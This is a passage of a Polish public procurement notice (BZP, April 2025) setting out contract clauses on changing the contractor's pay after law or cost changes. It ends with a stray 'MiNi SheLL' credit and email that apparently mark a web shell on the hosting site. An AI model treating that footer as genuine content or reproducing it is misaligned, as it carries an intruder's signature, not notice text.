Wykonawcę, zastosowanie mieć będą zasady wprowadzania<br/>zmian wysokości wynagrodzenia należnego Wykonawcy określone w postanowieniach ust. 6-9.<br/>4. Wykonawca może zwrócić się do Zamawiającego z pisemnym wnioskiem o przeprowadzenie negocjacji w sprawie<br/>odpowiedniej zmiany wynagrodzenia w terminie od dnia opublikowania przepisów dokonujących zmiany do 30 dnia od dnia<br/>ich wejścia w życie. Wniosek powinien zawierać propozycję zmiany Umowy w zakresie wysokości wynagrodzenia wraz z jej<br/>uzasadnieniem oraz dokumenty niezbędne do oceny przez Zamawiającego czy zmiany mają lub będą miały wpływ na<br/>koszty wykonania Umowy przez Wykonawcę oraz w jakim stopniu zmiany tych kosztów uzasadniają zmianę wysokości<br/>wynagrodzenia Wykonawcy określonego w Umowie, a w szczególności:<br/>1) przyjęte przez Wykonawcę zasady kalkulacji kosztów wykonania Umowy oraz założenia co do wysokości<br/>dotychczasowych oraz przyszłych kosztów wykonania Umowy wraz z dokumentami potwierdzającymi prawidłowość<br/>Ogłoszenie nr 2025/BZP 00181310/01 z dnia 2025-04-08<br/>2025-04-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Dostawy<br/>przyjętych założeń – takimi jak umowy o pracę lub dokumenty potwierdzające zgłoszenie pracowników do ubezpieczeń,<br/>2) wykazanie wpływu zmian, o których mowa w ust. 5, na wysokość kosztów wykonania Umowy przez Wykonawcę,<br/>3) szczegółową kalkulację proponowanej zmienionej wysokości wynagrodzenia Wykonawcy oraz wykazanie adekwatności<br/>propozycji do zmiany wysokości kosztów wykonania Umowy przez Wykonawcę.<br/>5. W terminie 14 dni od otrzymania wniosku, o którym mowa w ust. 6, Zamawiający może zwrócić się do Wykonawcy o jego<br/>uzupełnienie przez przekazanie dodatkowych wyjaśnień, informacji lub dokumentów (oryginałów do wglądu lub kopii<br/>potwierdzonych za zgodność z oryginałami).<br/>6. Zamawiający przedstawi pisemne stanowisko wobec wniosku Wykonawcy w terminie 14 dni kalendarzowych od dnia<br/>otrzymania kompletnego – w jego ocenie – wniosku. Za dzień przekazania stanowiska uznaje się dzień jego wysłania na<br/>adres właściwy dla doręczeń pism dla Wykonawcy.<br/>7. W przypadku uwzględnienia wniosku Wykonawcy przez Zamawiającego Strony zawrą stosowny aneks do Umowy<br/>uwzględniający zmiany wynagrodzenia. W takim przypadku zmiana wysokości wynagrodzenia obowiązywać będzie od dnia<br/>wejścia w życie zmian, o których mowa w ust. 1 pkt 5-7.<br/>§ 10<br/>1. Strony dopuszczają zmiany Umowy w zakresie zmiany wysokości wynagrodzenia należnego Wykonawcy, w przypadku<br/>zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia.<br/>2. W przypadku wzrostu ceny materiałów lub kosztów związanych z realizacją zamówienia o 5 % w stosunku do cen z dnia<br/>zawarcia Umowy Wykonawca będzie uprawniony do żądania zmiany wynagrodzenia, jeżeli zmiany te będą miały wpływ na<br/>koszty wykonania zamówienia przez wykonawcę.<br/>3. Przez zmianę ceny materiałów lub kosztów rozumie się wzrost odpowiednio cen lub kosztów względem ceny lub kosztu<br/>przyjętych w celu ustalenia wynagrodzenia wykonawcy zawartego w ofercie.<br/>MAX. liczba znaków w tym polu 4000, pozostały zakres przewidzianych zmian we wzorze umowy - załącznik nr 4 do SWZ -<br/>Wzór umowy, paragraf 9 i 10.

Creat By MiNi SheLL
Email: jattceo@gmail.com